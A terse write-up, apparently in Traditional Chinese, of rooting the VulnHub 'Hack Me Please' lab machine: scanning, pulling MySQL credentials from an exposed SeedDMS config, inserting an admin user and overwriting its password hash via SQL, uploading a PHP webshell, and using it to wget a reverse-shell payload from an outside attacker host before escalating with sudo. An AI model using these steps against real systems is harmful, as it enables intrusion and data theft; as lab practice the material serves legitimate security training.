URL : https://www.vulnhub.com/entry/hack-me-please-1,731/
IP : 192.168.1.111
Recon
- 掃 Port
rustscan -a 192.168.1.111nmap -A -p80,3306,33060 192.168.1.111
- 掃 Dir
python3 dirsearch.py -u http://192.168.1.111/
- 看不出啥特別ㄉ
- 觀察首頁
- 觀察
main.js
- 發現註解寫了一個
/seeddms51x/seeddms-5.1.22的路徑
DMS
- 掃路徑發現有
install等資訊 - 觀察原始碼
- 到 SorceForge 下載原始碼
- 觀察路徑
- 發現路徑內有
/conf/可能有重要的資訊
/conf/settings.xml可以存取- 裡面找到 mysql 的帳密
seeddms
- 裡面找到 mysql 的帳密
MySQL
- 進行 MySQL 連線
- 觀察 DB
- 觀察表格
users
- 找到一組帳密
saketsauravSaket@#$1337
- 但登入 DMS 失敗
- 找到
tblUsers
- 分析 hash
- 應該是 md5
- 哈希貓爆破
- 爆不出來QQ
- 自己創一個使用者
mysql INSERT INTO tblUsers (id,login,pwd,fullName,email,role,language,theme,comment) VALUES (3,"meow","4a4be40c96ac6314e91d93f38043a634","Meow","meow@meow.meow",1,"en_US",0,0);
- 可以登入,但畫面是白的 QQ
- 改使用者密碼
- 原本是
f9ef2c539bad8a6d2f3432b6d49ab51a- 先存著備用,怕以後要用到
update tblUsers set pwd='4a4be40c96ac6314e91d93f38043a634' where id=1;
- 就登入成功ㄌ
- 上傳 webshell
- 原本是
- 因為
seeddms51x目錄沒有鎖權限- 根據觀察,檔案會存在
http://192.168.1.111/seeddms51x/data/1048576/{檔案ID}/1.{檔案附檔名}
- 根據觀察,檔案會存在
- 載 Reverse shell
- http://192.168.1.111/seeddms51x/data/1048576/4/1.php?A=wget%20192.168.1.109:8000/s_l
- 接上 Reverse shell
- 使用交互式
python3 -c 'import pty; pty.spawn("/bin/bash")'
- 切換使用者
- 使用當初 DB 看到的密碼
- 使用交互式
- 提權
sudo -l發現可以直接成為 root
